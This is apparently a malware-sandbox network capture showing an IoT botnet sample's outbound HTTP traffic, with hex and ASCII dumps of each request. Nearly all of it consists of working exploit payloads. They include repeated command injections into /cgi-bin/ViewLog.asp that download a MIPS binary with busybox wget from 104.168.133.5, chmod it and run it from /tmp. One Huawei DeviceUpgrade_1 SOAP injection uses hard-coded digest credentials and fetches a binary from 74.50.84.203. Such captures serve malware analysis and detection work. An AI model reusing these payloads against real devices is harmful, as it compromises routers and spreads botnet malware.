                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:10.600775957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:19.560409069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.759648085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.622020960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24192.168.2.146068462.176.122.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:02.021197081 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25192.168.2.144292885.214.144.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:02.036258936 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:02.292979002 CET567INHTTP/1.1 403
                                              Vary: Origin
                                              Vary: Access-Control-Request-Method
                                              Vary: Access-Control-Request-Headers
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: 0
                                              Content-Type: application/json
                                              Transfer-Encoding: chunked
                                              Date: Thu, 23 Nov 2023 04:15:02 GMT
                                              Data Raw: 38 35 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 33 2d 31 31 2d 32 33 54 30 34 3a 31 35 3a 30 32 2e 31 34 33 2b 30 30 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 33 2c 22 65 72 72 6f 72 22 3a 22 46 6f 72 62 69 64 64 65 6e 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 63 63 65 73 73 20 44 65 6e 69 65 64 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a
                                              Data Ascii: 85{"timestamp":"2023-11-23T04:15:02.143+0000","status":403,"error":"Forbidden","message":"Access Denied","path":"/cgi-bin/ViewLog.asp"}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26192.168.2.143289431.136.63.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:04.450562954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:05.033004999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:06.184940100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:08.552840948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.160708904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:22.376250982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.807498932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.669959068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27192.168.2.1451248156.77.134.14337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:05.129391909 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28192.168.2.143494094.187.118.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:05.890990973 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29192.168.2.144898094.122.80.1458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.113641024 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              30192.168.2.145302894.122.235.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.696814060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              31192.168.2.145039431.136.111.1998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.879561901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:07.432894945 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:08.552839041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:10.856749058 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:15.464550018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
